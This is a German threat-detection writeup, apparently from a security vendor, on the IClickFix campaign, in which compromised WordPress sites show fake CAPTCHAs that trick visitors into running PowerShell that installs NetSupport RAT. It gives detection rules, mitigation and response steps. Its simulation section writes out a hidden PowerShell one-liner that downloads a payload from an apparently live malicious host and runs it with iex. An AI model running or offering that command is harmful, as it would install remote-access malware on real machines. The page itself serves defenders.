Lernen Sie IClickFix kennen: Ein weit verbreitetes WordPress-Framework, das die ClickFix-Taktik nutzt
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Der Bericht beschreibt IClickFix, ein bösartiges JavaScript-Framework, das WordPress-Seiten kompromittiert und ein gefälschtes Cloudflare-Drehkreuz-ähnliches CAPTCHA präsentiert. Der Köder zwingt Besucher dazu, einen PowerShell-Befehl auszuführen, der herunterlädt und installiert NetSupport RAT. Die Zustellung wird durch ein Verkehrsumverteilungssystem unterstützt, das um den YOURLS URL-Kürzer und eine rotierende Gruppe von Redirector-Domains aufgebaut ist. Forscher beobachteten seit Ende 2024 weltweit mehr als 3.800 kompromittierte WordPress-Seiten, die diese Kette bedienen.
Untersuchung
Sekoia-Analysten identifizierten das injizierte JavaScript-Tag ic-tracker-js auf kompromittierten Seiten und rekonstruierten dann den Umleitungsablauf über mehrere kurzlebige Domains. Sie erfassten das genaue PowerShell-Ausführungsmuster, das verwendet wurde, um die endgültige Nutzlast abzurufen, und stellten die abgeworfenen NetSupport RAT-Komponenten zusammen mit zugehörigen C2-Infrastrukturindikatoren wieder her.
Minderung
Überwachen Sie Webinhalte auf die ic-tracker-js Injektion und blockieren Sie bekannte bösartige Domains, Umleiter und Kurz-Links-Dienste, die in der Kette verwendet werden. Auf Endgeräten erkennen Sie PowerShell-Download-und-Ausführungs-Muster, die mit dem ClickFix-Köder übereinstimmen. Ergänzen Sie den Schutz um die Erstellung von NetSupport-Clientdateien und die Persistenz über user-level Run Registry-Schlüssel.
Antwort
Wenn Indikatoren auftreten, isolieren Sie das Endgerät, stoppen Sie den aktiven PowerShell-Prozess und entfernen Sie NetSupport-Binärdateien sowie jegliche Registry-basierte Persistenz. Führen Sie anschließend eine vollständige forensische Prüfung durch, um sicherzustellen, dass der Angreifer keine zusätzlichen Implantate eingesetzt oder sekundäre Zugangspfade eingerichtet hat.
Angriffsablauf
Erkennungen
Download oder Upload über Powershell (via cmdline)
Ansehen
Verdächtige Dateien im öffentlichen Benutzerprofil (via file_event)
Ansehen
Die Möglichkeit der Ausführung durch versteckte PowerShell-Befehlszeilen (via cmdline)
Ansehen
Verdächtige Nutzung von Invoke-RestMethod (via powershell)
Ansehen
Mögliche NetSupport Manager-Binärdatei, die aus verdächtigem Verzeichnis ausgeführt wird (via process_creation)
Ansehen
Mögliche Persistenzpunkte [ASEPs – Software/NTUSER Hive] (via registry_event)
Ansehen
IOCs (HashSha256) zur Erkennung: Treffen Sie IClickFix: ein weit verbreitetes WordPress-gezieltes Framework, das die ClickFix-Taktik verwendet
Ansehen
IOCs (DestinationIP) zur Erkennung: Treffen Sie IClickFix: ein weit verbreitetes WordPress-gezieltes Framework, das die ClickFix-Taktik verwendet
Ansehen
IOCs (SourceIP) zur Erkennung: Treffen Sie IClickFix: ein weit verbreitetes WordPress-gezieltes Framework, das die ClickFix-Taktik verwendet
Ansehen
IClickFix Böser JavaScript-Injektions-Erkennung [Webserver]
Ansehen
PowerShell-Befehlsausführung zur Lieferung von NetSupport RAT [Windows Powershell]
Ansehen
Simulation Ausführung
Voraussetzung: Die Telemetrie- & Basislinien-Überprüfung muss bestanden sein.
-
Angriffs-Narrativ & Befehle:
Ein Gegner, der initialen Zugang zum Endpunkt hat, möchte einen dauerhaften Fuß in der Tür verschaffen, indem er den NetSupport RAT bereitstellt. Um interaktive Erkennung zu vermeiden, starten sie PowerShell im versteckten Modus ohne Profil oder Logo (
-w hidden -nop -c). Sie verwenden dannInvoke‑WebRequest(iwr) um eine bösartige JSON-Nutzlast herunterzuladen (tytuy.json), die ein PowerShell-Skript für den RAT enthält. Das Skript wird in das temporäre Verzeichnis geschrieben und überInvoke‑Expressionausgeführt. Diese genaue Befehlszeile entspricht den Zeichenfolgen, die die Sigma-Regel überwacht. -
Regressionstestskript:
# PowerShell-Einzeiler, der der Erkennungsregel entspricht $url = 'https://scottvmorton.com/tytuy.json' $out = "$env:TEMPpayload.ps1" powershell -w hidden -nop -c "iwr '$url' -OutFile $out; iex (Get-Content $out -Raw)" -
Bereinigungskommandos:
# Entfernen Sie die heruntergeladene Nutzlast und alle verbleibenden PowerShell-Prozesse Remove-Item -Path "$env:TEMPpayload.ps1" -ErrorAction SilentlyContinue Get-Process -Name powershell | Where-Object {$_.CommandLine -match 'tytuy.json'} | Stop-Process -Force